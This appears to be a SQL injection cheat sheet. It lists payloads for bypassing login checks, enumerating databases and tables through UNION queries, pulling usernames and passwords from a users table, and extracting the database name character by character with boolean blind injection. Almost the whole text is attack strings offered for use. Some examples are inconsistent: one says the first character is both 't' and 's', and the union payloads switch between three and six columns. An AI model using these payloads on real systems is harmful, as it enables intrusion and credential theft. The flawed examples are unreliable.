SQL Injection
Bypass authentication
Section titled “Bypass authentication”| Query | Purpose |
|---|---|
admin' or '1'='1 | Bypass basic authentication |
admin')-- - | Bypass basic authentication with comments |
Union Injection
Section titled “Union Injection”| Query | Purpose |
|---|---|
wok' order by 1-- - | Detect the number of columns using order by |
wok' UNION select 1,2,3-- - | Detect the number of columns using Union injection |
wok' union select schema_name,2,3,4,5,6 from information_schema.schemata-- - | Get all databases |
wok' union select table_name,2,3,4,5,6 from information_schema.tables where table_schema=database();-- - | Get all tables |
wok' union select username,password,3,4,5,6 from users;-- - | Get username and password |
Blind SQL Boolean Based
Section titled “Blind SQL Boolean Based”check database length
Section titled “check database length”wok' and (length(database())) = 12— : false
wok' and (length(database())) > 12 — : true
wok' and (length(database())) = 13 — : true
guess the database name of each character
Section titled “guess the database name of each character”wok' and (substr(database(),1,1))=’t’ — : true
wok' and (substr(database(),1,1))=’s’ — : true
wok' and (substr(database(),1,2))=’sa’ — : false
wok' and (substr(database(),1,2))=’sq’ — : true
wok' and (substr(database(),1,13))=’sql_injection’ — : true